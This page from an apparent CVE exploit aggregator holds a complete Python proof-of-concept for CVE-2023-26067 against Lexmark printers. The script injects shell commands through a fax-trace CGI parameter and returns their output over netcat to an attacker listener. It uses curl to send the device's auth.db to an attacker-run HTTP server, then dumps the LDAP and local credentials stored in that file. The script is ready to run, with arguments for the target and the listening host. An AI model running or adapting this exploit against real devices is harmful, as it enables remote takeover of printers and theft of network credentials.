4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2023-26067.py PY
#!/usr/bin/python3
import argparse
import json
import os
import queue
import requests
import socket
import time
import threading
import urllib3
urllib3.disable_warnings()

import http.server
import socketserver
import io
import cgi
import sqlite3


class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):

    def do_POST(self):
        r, info = self.deal_post_data()
        print(r, info, "by: ", self.client_address)
        f = io.BytesIO()
        if r:
            f.write(b"Success\n")
        else:
            f.write(b"Failed\n")
        length = f.tell()
        f.seek(0)
        self.send_response(200)
        self.send_header("Content-type", "text/plain")
        self.send_header("Content-Length", str(length))
        self.end_headers()
        if f:
            self.copyfile(f, self.wfile)
            f.close()

    def log_message(self, one, two, three, four):
        return None

    def deal_post_data(self):
        ctype, pdict = cgi.parse_header(self.headers['Content-Type'])
        pdict['boundary'] = bytes(pdict['boundary'], "utf-8")
        pdict['CONTENT-LENGTH'] = int(self.headers['Content-Length'])
        if ctype == 'multipart/form-data':
            form = cgi.FieldStorage(fp=self.rfile, headers=self.headers,
                                    environ={'REQUEST_METHOD': 'POST', 'CONTENT_TYPE': self.headers['Content-Type'], })
            try:
                if isinstance(form["file"], list):
                    for record in form["file"]:
                        open("./auth.db", "wb").write(record.file.read())
                else:
                    open("./auth.db", "wb").write(form["file"].file.read())
            except IOError:
                return (False, "Can't create file to write, do you have permission to write?")
        return (True, "Files uploaded")


def start_file_server(fport):
    Handler = CustomHTTPRequestHandler
    socketserver.TCPServer.allow_reuse_address = True
    with socketserver.TCPServer(("", int(fport)), Handler) as httpd:
        print(f'[*] Starting HTTP server on {fport}')
        httpd.serve_forever()


def check_page_exists(url):
    r = requests.get(f'{url}/cgi-bin/fax_change_faxtrace_settings', verify=False, timeout=15)
    if r.status_code == 200:
        print('[*] Vulnerable page accessible!')
        return True
    else:
        print(f'[-] Vulnerable page returned status {r.status_code}')
        return False


def send_payload(url, data):
    print(f'[*] Sending payload to server...')
    # Payload request commonly is reported as a time out even when successful
    try:
        r = requests.post(url, verify=False, data=data, timeout=30)
    except requests.exceptions.ConnectionTimeout:
        pass

    print(f'[*] Sent payload')


def dump_creds():
    creds = {'local': [], 'ldap': []}
    c = sqlite3.connect('auth.db')
    cur = c.cursor()

    try:
        cur.execute('SELECT machine_dn,machine_password FROM ldap')
        rows = cur.fetchall()
        if rows:
            print(f'[+] LDAP Credentials:')
            for row in rows:
                cred = ':'.join(row)
                creds['ldap'].append(cred)
                print(cred)
        else:
            print('[*] No LDAP credentials configured')
    except:
        # Unknown error catch, but prevent missing table or field from returning data
        print('[*] No LDAP credentials configured')
        pass

    try:
        cur.execute('SELECT username,password_or_pin FROM internal_account')
        rows = cur.fetchall()
        if rows:
            print(f'[+] Local Credentials:')
            for row in rows:
                cred = ':'.join(row)
                creds['local'].append(cred)
                print(cred)
        else:
            print('[*] No local credentials configured')
    except:
        # Unknown error catch, but prevent missing table or field from returning data
        print('[*] No local credential configured')
        pass

    return creds


def catch_output(lport, output_q):
    try:
        conn = None
        data = None
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.settimeout(15)
        s.bind(('0.0.0.0', int(lport)))
        s.listen(1)
        print(f'[*] Listening for blind output on 0.0.0.0:{lport}')

        conn, addr = s.accept()
        conn.settimeout(30)
        while 1:
            data = conn.recv(1024)
            if data:
                break
    except socket.timeout:
        pass
    finally:
        if conn:
            conn.close()
        output_q.put(data)

def blind_execute(url, lhost, lport, cmd, get_response):
    if get_response:
        payload = f'echo `{cmd}` | nc {lhost} {lport}'
        output_q = queue.Queue()
        t1 = threading.Thread(target=catch_output, args=(lport, output_q), daemon=True)
        t1.start()
    else:
        payload = cmd

    # Send the blind command
    url = f'{url}/cgi-bin/fax_change_faxtrace_settings'
    data = f'FT_Custom_lbtrace=$({payload})'
    send_payload(url, data)

    if get_response:
        t1.join(30)
        try:
            res = output_q.get(timeout=10)
            if res:
                return res.decode().strip()
        except queue.Empty:
            return None

def exec_and_dump(output, url, lhost, lport, fport):
    print(f'[*] Attempting to dump auth database')
    # Start HTTP server to catch auth.db
    ft = threading.Thread(target=start_file_server, args=(fport,), daemon=True)
    ft.start()

    # Post it
    payload = f"curl -F 'file=@/var/fs/security/auth/auth.db' http://{lhost}:{fport}/"
    blind_execute(url, lhost, lport, payload, get_response=False)

    # Extract it
    print(f'[*] Waiting to pilfer database...')
    time.sleep(15)
    if not os.path.exists('auth.db'):
        raise ValueError('Failed exfiltrating auth.db')

    creds = dump_creds()
    output.update(creds)
    return output

def wakeup(url):
    print('[*] Sending wakeup 1')
    r = requests.get(url, verify=False, timeout=15)

    print('[*] Sending wakeup 2')
    r = requests.get(url, verify=False, timeout=15)

def exploit(url, lhost, lport, fport):
    output = {'vulnerable': False}

    # Lexmark web service seems to hang when getting in-op traffic at same time, sleep and retry
    for i in range(3):
        try:
            wakeup(url)

            print('[*] Checking if vulnerable page is accessible')
            exists = check_page_exists(url)
            if not exists:
                output['vulnerable'] = False
                return output

            print('[*] Checking if vulnerable')
            id_output = blind_execute(url, lhost, lport, 'id', get_response=True)
            if 'httpd' in id_output:
                print(f'[+] id output: {id_output}')
                output['vulnerable'] = True
                break
            else:
                print('[-] Not vulnerable!')
                output['vulnerable'] = False
                return output
        except:
            time.sleep(30)
            pass

    for i in range(3):
        try:
            output = exec_and_dump(output, url, lhost, lport, fport)
            local = output.get('local')
            if isinstance(local, list):
               break
        except:
            time.sleep(30)
            pass
        finally:
            return output


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', help='The URL of the target', required=True)
    parser.add_argument('-l', '--lhost', help='The IP address of the listening post', required=True)
    parser.add_argument('-p', '--lport', help='The local port to start the socket to catch command output', default=443)
    parser.add_argument('-f', '--fport', help='The local port to start the HTTP service for catching files',
                        default=8443)
    args = parser.parse_args()

    output = exploit(args.url, args.lhost, args.lport, args.fport)
    with open('output.json', 'w') as f:
        f.write(json.dumps(output))